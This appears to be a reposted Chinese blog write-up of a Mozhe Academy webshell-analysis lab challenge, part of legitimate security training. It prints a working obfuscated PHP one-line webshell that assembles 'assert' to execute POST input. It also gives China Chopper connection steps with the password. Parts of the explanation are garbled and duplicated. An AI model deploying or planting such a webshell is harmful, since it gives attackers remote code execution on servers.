墨者学院 - WebShell代码分析溯源(第3题)

其他 2018-08-07 14:16:16 阅读次数: 0

$g是个数组，根据ASCll码对应表可以得到$g[1]='s'，chr('116')='t'，那么$gg=assert，@$gg($_POST[joker])不就是assert($_POST[joker])，组成了我们常见的一句话脚本

运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get

html路径下拿到key

<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>

用法: http://www.xxx.com/2.php

菜刀连接用法: http://www.xxx.com/2.php

密码：joker

详解：$g是个数组，g[1]=′s′，chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表)，这样的g[1]=′s′，chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表)，这样的gg=

assert，@gg(gg(_POST[joker])不就是assert($_POST[joker])，是我们常见的一句话木马，直接菜刀链接即可

猜你喜欢

转载自blog.csdn.net/qq_42357070/article/details/81304698

墨者学院 - WebShell代码分析溯源(第3题)

墨者学院 - WebShell代码分析溯源(第8题)

墨者学院 - WebShell代码分析溯源(第11题)

墨者学院 - WebShell代码分析溯源(第10题)

墨者学院 - WebShell代码分析溯源(第5题)

墨者学院 - WebShell代码分析溯源(第4题)

墨者学院 - WebShell代码分析溯源(第2题)

墨者学院-WebShell代码分析溯源(第1题)

墨者学院 - WebShell代码分析溯源(第9题)

墨者学院 - WebShell代码分析溯源(第7题)

墨者学院 - WebShell代码分析溯源(第6题)

墨者学院WebShell代码分析溯源(第6题)

墨者学院 - PHP代码分析溯源(第3题)

墨者学院-PHP代码分析溯源(第3题)

墨者学院 - PHP代码分析溯源(第2题)

墨者学院 - PHP代码分析溯源(第4题)

墨者学院 - WebShell文件上传漏洞分析溯源(第1题)

墨者学院 - WebShell文件上传漏洞分析溯源(第2题)

墨者学院 - WebShell文件上传分析溯源(第2题)

墨者学院 - WebShell文件上传漏洞分析溯源(第4题)

墨者学院 - WebShell文件上传分析溯源(第1题)

墨者学院-php代码分析溯源

墨者学院靶场之PHP代码分析溯源(第1题)

墨者学院 - CMS系统漏洞分析溯源(第3题)

墨者学院-CMS系统漏洞分析溯源(第3题)

墨者学院-命令注入执行分析

墨者学院 - CMS系统漏洞分析溯源(第2题)

墨者学院 - CMS系统漏洞分析溯源(第4题)

墨者学院 - CMS系统漏洞分析溯源(第5题)

墨者学院-CMS系统漏洞分析溯源(第6题)

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)